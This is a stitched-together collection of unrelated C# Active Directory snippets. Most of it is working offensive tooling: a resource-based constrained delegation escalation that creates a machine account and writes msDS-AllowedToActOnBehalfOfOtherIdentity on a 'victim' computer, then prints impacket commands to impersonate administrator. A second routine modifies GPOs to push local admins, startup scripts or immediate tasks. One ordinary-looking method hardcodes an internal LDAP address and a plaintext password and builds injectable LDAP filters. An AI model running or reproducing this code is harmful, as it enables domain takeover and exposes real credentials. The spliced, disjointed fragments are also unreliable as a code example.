public HttpResponseMessage getActiveDirectoryUserDetail(HttpRequestMessage request, string loginid)
{
return(GetHttpResponse(request, () =>
{
HttpResponseMessage response = null;
loginid = loginid.Replace("FORWARDSLASHXTER", "/").Trim();
loginid = loginid.Replace("DOTXTER", ".").Trim();
string connection = ConfigurationManager.ConnectionStrings["ADConnectionString"].ToString();
System.DirectoryServices.DirectorySearcher dssearch = new System.DirectoryServices.DirectorySearcher(connection);
dssearch.Filter = "(sAMAccountName=" + loginid + ")";
System.DirectoryServices.SearchResult sresult = dssearch.FindOne();
System.DirectoryServices.DirectoryEntry dsresult = sresult.GetDirectoryEntry();
string firstname = Convert.ToString(dsresult.Properties["givenName"].Value);
string lastname = Convert.ToString(dsresult.Properties["sn"].Value); //sn means surname
//string empid = Convert.ToString(dsresult.Properties["employeeID"].Value);
string empid = Convert.ToString(dsresult.Properties["company"].Value);
//string empno = Convert.ToString(dsresult.Properties["employeeNumber"].Value);
string mail = Convert.ToString(dsresult.Properties["mail"].Value);
var ADuserdetail = new UserSetup()
{
//LoginID = loginid,
//Name = "Taiwo",
//Email = "*****@*****.**",
//StaffID = "empid"
LoginID = loginid,
Name = firstname + " " + lastname,
Email = mail,
StaffID = empid
};
response = request.CreateResponse <UserSetup>(HttpStatusCode.OK, ADuserdetail);
return response;
}));
}
public static void SetSecurityDescriptor(String Domain, String victim_distinguished_name, String victimcomputer, String sid, bool cleanup)
{
// get the domain object of the victim computer and update its securty descriptor
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
myldapConnection.Path = "LDAP://" + victim_distinguished_name;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
search.Filter = "(cn=" + victimcomputer + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try
{
result = search.FindOne();
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "Exiting...");
return;
}
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
String sec_descriptor = "";
if (!cleanup)
{
sec_descriptor = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid + ")";
System.Security.AccessControl.RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] descriptor_buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(descriptor_buffer, 0);
// Add AllowedToAct Security Descriptor
entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Value = descriptor_buffer;
}
else
{
// Cleanup attribute
Console.WriteLine("[+] Clearing attribute...");
entryToUpdate.Properties["msds-allowedtoactonbehalfofotheridentity"].Clear();
}
try
{
// Commit changes to the security descriptor
entryToUpdate.CommitChanges();
Console.WriteLine("[+] Attribute changed successfully");
Console.WriteLine("[+] Done!");
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
Console.WriteLine("[!] Could not update attribute!\nExiting...");
return;
}
}
else
{
Console.WriteLine("[!] Computer Account not found!\nExiting...");
}
return;
}
// Updage GPT.ini so that changes take effect without gpupdate /force
public static void UpdateVersion(String Domain, String distinguished_name, String GPOName, String path, String function)
{
String line = "";
List <string> new_list = new List <string>();
if (!File.Exists(path))
{
Console.WriteLine("[-] Could not find GPT.ini. The group policy might need to be updated manually using 'gpupdate /force'");
}
// get the object of the GPO and update its versionNumber
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
myldapConnection.Path = "LDAP://" + distinguished_name;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
search.Filter = "(displayName=" + GPOName + ")";
string[] requiredProperties = new string[] { "versionNumber", "gPCMachineExtensionNames" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try
{
result = search.FindOne();
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "[!] Exiting...");
System.Environment.Exit(0);
}
int new_ver = 0;
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
// get AD number of GPO and increase it by 1
new_ver = Convert.ToInt32(entryToUpdate.Properties["versionNumber"].Value) + 1;
entryToUpdate.Properties["versionNumber"].Value = new_ver;
// update gPCMachineExtensionNames to add local admin
if (function == "AddLocalAdmin" || function == "AddNewRights")
{
try
{
if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]"))
{
entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]";
}
}
catch
{
entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]";
}
}
// update gPCMachineExtensionNames to add immediate task
if (function == "NewImmediateTask")
{
try
{
if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]"))
{
entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]";
}
}
catch
{
entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{00000000-0000-0000-0000-000000000000}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}][{AADCED64-746C-4633-A97C-D61349046527}{CAB54552-DEEA-4691-817E-ED4A4D1AFC72}]";
}
}
// update gPCMachineExtensionNames to add startup script
if (function == "NewStartupScript")
{
try
{
if (!entryToUpdate.Properties["gPCMachineExtensionNames"].Value.ToString().Contains("[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]"))
{
entryToUpdate.Properties["gPCMachineExtensionNames"].Value += "[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]";
}
}
catch
{
entryToUpdate.Properties["gPCMachineExtensionNames"].Value = "[{42B5FAAE-6536-11D2-AE5A-0000F87571E3}{40B6664F-4972-11D1-A7CA-0000F87571E3}]";
}
}
try
{
// Commit changes to the security descriptor
entryToUpdate.CommitChanges();
Console.WriteLine("[+] versionNumber attribute changed successfully");
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message);
Console.WriteLine("[!] Could not update versionNumber attribute!\nExiting...");
System.Environment.Exit(0);
}
}
else
{
Console.WriteLine("[!] GPO not found!\nExiting...");
System.Environment.Exit(0);
}
using (System.IO.StreamReader file = new System.IO.StreamReader(path))
{
while ((line = file.ReadLine()) != null)
{
if (line.Replace(" ", "").Contains("Version="))
{
line = line.Split('=')[1];
line = "Version=" + Convert.ToString(new_ver);
}
new_list.Add(line);
}
}
using (System.IO.StreamWriter file2 = new System.IO.StreamWriter(path))
{
foreach (string l in new_list)
{
file2.WriteLine(l);
}
}
Console.WriteLine("[+] The version number in GPT.ini was increased successfully.");
if (function == "AddLocalAdmin")
{
Console.WriteLine("[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.\n[+] Done!");
}
else if (function == "NewStartupScript")
{
Console.WriteLine("[+] The GPO was modified to include a new startup script. Wait for the GPO refresh cycle.\n[+] Done!");
}
else if (function == "NewImmediateTask")
{
Console.WriteLine("[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.\n[+] Done!");
}
else if (function == "AddNewRights")
{
Console.WriteLine("[+] The GPO was modified to assign new rights to target user. Wait for the GPO refresh cycle.\n[+] Done!");
}
}
public ActionResult <ADProperties> GetAdsProperties(string userName)
{
ADProperties aDProperties = new ADProperties();
try
{
const string LDAP_PATH = "LDAP://10.12.0.8"; //"/CN=VCH USERS,DC=MUSA,DC=net";
//const string LDAP_DOMAIN = "10.12.0.8";//"exldap.example.com:5555";
//const string FirstName = "Cinthia";
//const string LastName = "Schram";
string titleValue = "";
string departmentValue = "";
using (var ade = new System.DirectoryServices.DirectoryEntry(LDAP_PATH, "vgh\\ngediya", "Ayush080982"))
using (var dss = new System.DirectoryServices.DirectorySearcher(ade))
{
// string filter = @"(&(givenname=" + FirstName + ")(sn=" + LastName + "))";
string filter = @"(&(sAMAccountName=" + userName + "))";
//dss.Filter = "(sAMAccountName=ngediya)";
dss.Filter = filter;
System.DirectoryServices.SearchResult sresult = dss.FindOne();
System.DirectoryServices.DirectoryEntry dsresult = sresult.GetDirectoryEntry();
//Console.WriteLine("First Name:" + dsresult.Properties["givenname"][0].ToString());
//Console.WriteLine("Last Name:" + dsresult.Properties["cn"][0].ToString());
//Console.WriteLine("Full Name:" + dsresult.Properties["name"][0].ToString());
//Console.WriteLine("Mail:" + dsresult.Properties["mail"][0].ToString());
//Console.WriteLine("LoginId" + dsresult.Properties["sAMAccountName"][0].ToString());
foreach (var item in sresult.Properties.PropertyNames)
{
try
{
if (dsresult.Properties[item.ToString()].Count > 0)
{ //Console.WriteLine(item.ToString() + ":" + dsresult.Properties[item.ToString()][0].ToString());
if (item.ToString() == "title")
{
titleValue = dsresult.Properties[item.ToString()][0].ToString();
aDProperties.Title = titleValue;
}
if (item.ToString() == "department")
{
departmentValue = dsresult.Properties[item.ToString()][0].ToString();
aDProperties.Location = departmentValue;
}
if (item.ToString() == "givenname")
{
aDProperties.FirstName = dsresult.Properties[item.ToString()][0].ToString();
}
if (item.ToString() == "sn")
{
aDProperties.LastName = dsresult.Properties[item.ToString()][0].ToString();
}
if (item.ToString() == "mail")
{
aDProperties.EmailAddress = dsresult.Properties[item.ToString()][0].ToString();
}
}
}
catch (Exception ex)
{
//Console.WriteLine("Error ----->" + item.ToString());
return(null);
}
}
}
return(aDProperties);
}
catch (Exception ex)
{
// _log.Log(LogLevel.Information, ex.Message);
return(aDProperties);
}
}
static void Main(string[] args)
{
if (args.Length < 2)
{
Usage();
return;
}
var arguments = new Dictionary <string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
}
if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm"))
{
Usage();
return;
}
String DomainController = arguments["dc"];
String Domain = arguments["domain"];
String new_MachineAccount = "";
String new_MachineAccount_password = "";
//添加的机器账户
if (arguments.ContainsKey("ma"))
{
new_MachineAccount = arguments["ma"];
}
else
{
new_MachineAccount = RandomString(8);
}
//机器账户密码
if (arguments.ContainsKey("ma"))
{
new_MachineAccount_password = arguments["mp"];
}
else
{
new_MachineAccount_password = RandomString(10);
}
String victimcomputer = arguments["tm"];; //需要进行提权的机器
String machine_account = new_MachineAccount;
String sam_account = "";
String DistinguishedName = "";
if (machine_account.EndsWith("$"))
{
sam_account = machine_account;
machine_account = machine_account.Substring(0, machine_account.Length - 1);
}
else
{
sam_account = machine_account + "$";
}
String distinguished_name = DistinguishedName;
String victim_distinguished_name = DistinguishedName;
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
victim_distinguished_name += ",DC=" + DC;
}
Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
Console.WriteLine("[+] New SAMAccountName = " + sam_account);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
//通过ldap找计算机
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
myldapConnection.Path = "LDAP://" + victim_distinguished_name;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
search.Filter = "(CN=" + victimcomputer + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try
{
result = search.FindOne();
}
catch (System.Exception ex)
{
Console.WriteLine(ex.Message + "[-] Exiting...");
return;
}
try
{
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try
{
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
if (result != null)
{
System.DirectoryServices.DirectoryEntry entryToUpdate = result.GetDirectoryEntry();
String sec_descriptor = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(buffer, 0);
//测试sddl转换结果
//RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0);
//Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All));
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
try
{
//entryToUpdate.Properties["msDS-AllowedToActOnBehalfOfOtherIdentity"].Value = buffer;
entryToUpdate.InvokeSet("msDS-AllowedToActOnBehalfOfOtherIdentity", buffer);
entryToUpdate.CommitChanges();//提交更改
entryToUpdate.Close();
Console.WriteLine("[+] Exploit successfully!");
//打印利用方式
Console.WriteLine("[+] Use impacket to get priv!\n\n[+] Command:\n");
Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain);
Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache");
Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain);
}
catch (System.Exception ex)
{
Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException);
Console.WriteLine("[!] Failed...");
return;
}
}
}